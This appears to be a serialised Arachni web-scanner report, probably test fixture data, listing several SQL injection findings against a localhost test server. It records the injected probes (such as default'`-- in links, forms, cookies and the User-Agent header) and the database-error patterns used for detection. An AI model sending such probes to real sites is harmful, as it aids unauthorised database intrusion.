'["(PLS|ORA)-[0-9][0-9][0-9][0-9]\njava.sql.SQLException\nOracle error\nOracle stuff Driver\nWarning stuff oci_ stuff\nWarning stuff ora_ stuff\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTUx !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1MCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/oracle/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:java\.sql\.SQLException) :match: java.sql.SQLException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/oracle/link/append?input=default :verification: :id: java.sql.SQLException var: input url: http://localhost:7362/oracle/link/append?input=default injected: default'`-- id: java.sql.SQLException regexp: (?i-mx:java\.sql\.SQLException) regexp_match: java.sql.SQLException elem: link remarks: {} method: GET response: ! 
'(PLS|ORA)-[0-9][0-9][0-9][0-9] java.sql.SQLException Oracle error Oracle stuff Driver Warning stuff oci_ stuff Warning stuff ora_ stuff ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTM2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1MCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/oracle/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:java\.sql\.SQLException) :match: java.sql.SQLException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value'`-- :injected: cookie value'`-- :combo: !binary "Y29va2llMg==": cookie value'`-- :action: http://localhost:7362/oracle/cookie/append :verification: :id: java.sql.SQLException var: cookie2 url: http://localhost:7362/oracle/cookie/append injected: cookie value'`-- id: java.sql.SQLException regexp: (?i-mx:java\.sql\.SQLException) regexp_match: java.sql.SQLException elem: cookie remarks: {} method: GET response: ! 
'(PLS|ORA)-[0-9][0-9][0-9][0-9] java.sql.SQLException Oracle error Oracle stuff Driver Warning stuff oci_ stuff Warning stuff ora_ stuff ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value'`-- response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTM2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/oracle/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:java\.sql\.SQLException) :match: java.sql.SQLException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/oracle/cookie/flip :verification: :id: java.sql.SQLException var: Parameter flip url: http://localhost:7362/oracle/cookie/flip injected: '' id: java.sql.SQLException regexp: (?i-mx:java\.sql\.SQLException) regexp_match: java.sql.SQLException elem: cookie remarks: {} method: GET response: ! 
'[nil, "(PLS|ORA)-[0-9][0-9][0-9][0-9]\njava.sql.SQLException\nOracle error\nOracle stuff Driver\nWarning stuff oci_ stuff\nWarning stuff ora_ stuff\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTUx !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/oracle/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:java\.sql\.SQLException) :match: java.sql.SQLException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/oracle/header/flip :verification: :id: java.sql.SQLException var: Parameter flip url: http://localhost:7362/oracle/header/flip injected: '' id: java.sql.SQLException regexp: (?i-mx:java\.sql\.SQLException) regexp_match: java.sql.SQLException elem: header remarks: {} method: GET response: ! 
'[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "(PLS|ORA)-[0-9][0-9][0-9][0-9]\njava.sql.SQLException\nOracle error\nOracle stuff Driver\nWarning stuff oci_ stuff\nWarning stuff ora_ stuff\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mjk2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/oracle/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:java\.sql\.SQLException) :match: java.sql.SQLException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/oracle/header/append :verification: :id: java.sql.SQLException var: User-Agent url: http://localhost:7362/oracle/header/append injected: arachni_user'`-- id: java.sql.SQLException regexp: (?i-mx:java\.sql\.SQLException) regexp_match: java.sql.SQLException elem: header remarks: {} method: GET response: ! '(PLS|ORA)-[0-9][0-9][0-9][0-9] java.sql.SQLException Oracle error Oracle stuff Driver Warning stuff oci_ stuff Warning stuff ora_ stuff ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTM2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjowMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/coldfusion/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[SQLServer JDBC Driver\]) :match: ! '[SQLServer JDBC Driver]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/coldfusion/form/append :verification: :id: ! '[SQLServer JDBC Driver]' var: input url: http://localhost:7362/coldfusion/form/append injected: default'`-- id: ! 
'[SQLServer JDBC Driver]' regexp: (?i-mx:\[SQLServer JDBC Driver\]) regexp_match: ! '[SQLServer JDBC Driver]' elem: form remarks: {} method: GET response: ! '[Macromedia][SQLServer JDBC Driver] ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/coldfusion/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[SQLServer JDBC Driver\]) :match: ! '[SQLServer JDBC Driver]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/coldfusion/form/flip :verification: :id: ! '[SQLServer JDBC Driver]' var: Parameter flip url: http://localhost:7362/coldfusion/form/flip injected: '' id: ! '[SQLServer JDBC Driver]' regexp: (?i-mx:\[SQLServer JDBC Driver\]) regexp_match: ! '[SQLServer JDBC Driver]' elem: form remarks: {} method: GET response: ! 
'["[Macromedia][SQLServer JDBC Driver]\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/coldfusion/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[SQLServer JDBC Driver\]) :match: ! '[SQLServer JDBC Driver]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/coldfusion/link/flip?input=default :verification: :id: ! '[SQLServer JDBC Driver]' var: Parameter flip url: http://localhost:7362/coldfusion/link/flip?input=default injected: '' id: ! '[SQLServer JDBC Driver]' regexp: (?i-mx:\[SQLServer JDBC Driver\]) regexp_match: ! '[SQLServer JDBC Driver]' elem: link remarks: {} method: GET response: ! 
'["[Macromedia][SQLServer JDBC Driver]\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL 